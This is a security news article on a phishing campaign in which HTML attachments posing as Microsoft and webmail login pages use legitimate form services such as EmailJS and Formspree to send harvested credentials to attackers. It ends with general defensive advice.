An ongoing phishing campaign has been discovered, revealing that attackers are using legitimate credential harvesting services and data exfiltration techniques to avoid detection. According to recent data, credential harvesting remains the most common attack vector, accounting for 59% of all recorded assaults. This method also contributes significantly to business email compromise (BEC), which makes up 15% of all attacks.
One of the most popular attack vectors used by cybercriminals is HTML files, making up more than 50% of malicious attachments, according to Check Point’s telemetry. These files often masquerade as login pages for well-known services and companies like Microsoft and Webmail in order to deceive unsuspecting users.
Phishing campaigns involving tens of thousands of emails have been observed to utilize reputable services such as EmailJS, Formbold, Formspree, and Formspark to collect stolen credentials. These online form builders are commonly used by developers to create unique forms for their websites or web applications. These forms can include various types of form field elements, such as text input fields, radio buttons, checkboxes, and dropdown menus, to systematically gather user data. Once a user submits the form, the service processes the data and collects the compromised credentials.
The process of harvesting credentials, also known as “credential harvesting,” enables criminals to acquire sensitive information like usernames and passwords, which they can use to gain initial access to companies or sell on the dark web. This method has become increasingly challenging to combat, as attackers leverage legitimate services, making it harder to block malicious HTML files. By using the API of these services, attackers can send stolen credentials to any location of their choosing, including their own mailbox.
Researchers explain that one of the ongoing campaigns they discovered starts with a phishing email that pressures the recipient to open an attachment. This campaign uses multiple versions of the email and various HTML templates. In these templates, the victim’s email address is pre-filled in the form, giving the sign-in page a more trustworthy appearance. As soon as the victim enters their login and password and tries to log in, the attacker receives their credentials directly in their email inbox.
To effectively defend against phishing attempts, organizations are advised to implement security awareness training, email filtering, scanning for malicious attachments, and checking for spelling and grammar errors. Additionally, utilizing anti-phishing solutions can further enhance an organization’s cybersecurity posture.
In conclusion, attackers are employing legitimate credential harvesting services and data exfiltration techniques to evade detection in an ongoing phishing campaign. Credential harvesting remains the most common attack vector, contributing significantly to BEC attacks. HTML files are frequently used as the attack vector, often posing as login pages for reputable services and companies. By leveraging reputable online form builders, attackers collect stolen credentials systematically. To combat these threats, organizations should implement various security measures, including awareness training and anti-phishing solutions.